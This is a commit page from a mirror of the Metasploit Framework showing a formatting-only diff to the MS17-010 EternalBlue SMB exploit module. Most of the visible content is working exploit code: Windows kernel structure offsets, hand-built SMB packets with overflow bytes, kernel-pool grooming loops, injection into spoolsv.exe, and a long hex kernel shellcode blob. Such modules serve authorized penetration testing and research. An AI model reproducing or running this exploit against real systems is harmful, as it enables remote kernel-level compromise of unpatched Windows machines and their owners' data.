infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Stop some of the rubocop carnage

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-11-05 14:11:24 -06:00
parent 5ec155fd44
commit 4f2ba46125
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 47 additions and 49 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

96
modules/exploits/windows/smb/ms17_010_eternalblue.rb
View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
'Description' => %q{
'Description' => %q(
This module is a port of the Equation Group ETERNALBLUE exploit, part of
the FuzzBunch toolkit released by Shadow Brokers.
@ -35,78 +35,81 @@ class MetasploitModule < Msf::Exploit::Remote
On some systems, this module may cause system instability and crashes, such as a BSOD or
a reboot. This may be more likely with some payloads.
},
),
'Author' => [
'Author' =>
[
'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
'Equation Group',
'Shadow Brokers',
'thelightcosine' # RubySMB refactor and Fallback Credential mode
],
'thelightcosine' # RubySMB refactor and Fallback Credential mode
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'MSB', 'MS17-010' ],
[ 'CVE', '2017-0143' ],
[ 'CVE', '2017-0144' ],
[ 'CVE', '2017-0145' ],
[ 'CVE', '2017-0146' ],
[ 'CVE', '2017-0147' ],
[ 'CVE', '2017-0148' ],
[ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]
['MSB', 'MS17-010'],
['CVE', '2017-0143'],
['CVE', '2017-0144'],
['CVE', '2017-0145'],
['CVE', '2017-0146'],
['CVE', '2017-0147'],
['CVE', '2017-0148'],
['URL', 'https://github.com/RiskSense-Ops/MS17-010']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 5,
'EXITFUNC' => 'thread',
'WfsDelay' => 5
},
'Privileged' => true,
'Payload' =>
{
'Space' => 2000, # this can be more, needs to be recalculated
'EncoderType' => Msf::Encoder::Type::Raw,
'Space' => 2000, # this can be more, needs to be recalculated
'EncoderType' => Msf::Encoder::Type::Raw
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',
[
'Windows 7 and Server 2008 R2 (x64) All Service Packs',
{
'Platform' => 'win',
'Arch' => [ ARCH_X64 ],
'Arch' => [ARCH_X64],
'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
'et_alertable' => 0x4c, # ETHREAD.Alertable offset
'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
}
],
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 14 2017',
'Notes' =>
{
'AKA' => ['ETERNALBLUE']
}
'Notes' =>
{
'AKA' => ['ETERNALBLUE']
}
))
register_options(
[
Opt::RPORT(445),
OptBool.new( 'VERIFY_TARGET', [ true, "Check if remote OS matches exploit Target.", true ] ),
OptBool.new( 'VERIFY_ARCH', [ true, "Check if remote architecture matches exploit Target.", true ] ),
OptString.new('SMBUser', [ false, '(Optional) The username to authenticate as', '']),
OptString.new('SMBPass', [ false, '(Optional) The password for the specified username', '']),
OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),
])
OptBool.new('VERIFY_TARGET', [true, "Check if remote OS matches exploit Target.", true]),
OptBool.new('VERIFY_ARCH', [true, "Check if remote architecture matches exploit Target.", true]),
OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])
]
)
register_advanced_options(
[
OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),
OptInt.new( 'MaxExploitAttempts', [ true, "The number of times to retry the exploit.", 3 ] ),
OptInt.new( 'GroomAllocations', [ true, "Initial number of times to groom the kernel pool.", 12 ] ),
OptInt.new( 'GroomDelta', [ true, "The amount to increase the groom count by per try.", 5 ] ),
])
OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
OptInt.new('MaxExploitAttempts', [true, "The number of times to retry the exploit.", 3]),
OptInt.new('GroomAllocations', [true, "Initial number of times to groom the kernel pool.", 12]),
OptInt.new('GroomDelta', [true, "The amount to increase the groom count by per try.", 5])
]
)
end
@ -118,9 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
begin
for i in 1..datastore['MaxExploitAttempts']
grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
smb_eternalblue(datastore['ProcessName'], grooms)
# we don't need this sleep, and need to find a way to remove it
@ -462,7 +463,7 @@ class MetasploitModule < Msf::Exploit::Remote
timeout_value = "\x35\x00\xd0" + timeout.chr
packet = RubySMB::SMB1::Packet::Trans2::Request.new
packet = set_smb1_headers(packet,tree_id,user_id)
packet = set_smb1_headers(packet, tree_id, user_id)
# The packets are labeled as Secondary Requests but are actually structured
# as normal Trans2 Requests for some reason. We shall similarly cheat here.
@ -486,7 +487,7 @@ class MetasploitModule < Msf::Exploit::Remote
pkt << "\x41" * 2957
pkt << "\x80\x00\xa8\x00" # overflow
pkt << "\x80\x00\xa8\x00" # overflow
pkt << "\x00" * 0x10
pkt << "\xff\xff"
@ -494,7 +495,7 @@ class MetasploitModule < Msf::Exploit::Remote
pkt << "\xff\xff"
pkt << "\x00" * 0x16
pkt << "\x00\xf1\xdf\xff" # x86 addresses
pkt << "\x00\xf1\xdf\xff" # x86 addresses
pkt << "\x00" * 0x8
pkt << "\x20\xf0\xdf\xff"
@ -539,7 +540,7 @@ class MetasploitModule < Msf::Exploit::Remote
# our values here.
packet.data_block.enable_padding = false
packet = set_smb1_headers(packet,tree_id,user_id)
packet = set_smb1_headers(packet, tree_id, user_id)
packet.parameter_block.max_setup_count = 1
packet.parameter_block.total_parameter_count = 30
@ -555,7 +556,7 @@ class MetasploitModule < Msf::Exploit::Remote
packet.parameter_block.setup << 0x0000
packet.data_block.byte_count = 1004
packet.data_block.trans2_parameters = "\x00" * 31 + "\x01" + ( "\x00" * 973 )
packet.data_block.trans2_parameters = "\x00" * 31 + "\x01" + ("\x00" * 973)
packet
end
@ -602,15 +603,14 @@ class MetasploitModule < Msf::Exploit::Remote
end
def ror(dword, bits)
( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
end
def make_kernel_shellcode(proc_name)
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
# Length: 1019 bytes
#"\xcc"+
# "\xcc"+
"\x31\xC9\x41\xE2\x01\xC3\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8" +
"\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A" +
"\x00\x00\x00\x48\x89\xC2\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8" +
@ -675,14 +675,13 @@ class MetasploitModule < Msf::Exploit::Remote
"\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" +
"\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" +
"\x48\x89\xEC\x5D\x41\x5F\x5E\xC3"#\x01\x00\xC3"
end
# Sets common SMB1 Header values used by the various
# packets in the exploit.
#
# @return [RubySMB::GenericPacket] the modified version of the packet
def set_smb1_headers(packet,tree_id,user_id)
def set_smb1_headers(packet, tree_id, user_id)
packet.smb_header.flags2.read("\x07\xc0")
packet.smb_header.tid = tree_id
packet.smb_header.uid = user_id
@ -691,7 +690,6 @@ class MetasploitModule < Msf::Exploit::Remote
packet
end
# Returns the value to be passed to SMB clients for
# the password. If the user has not supplied a password
# it returns an empty string to trigger an anonymous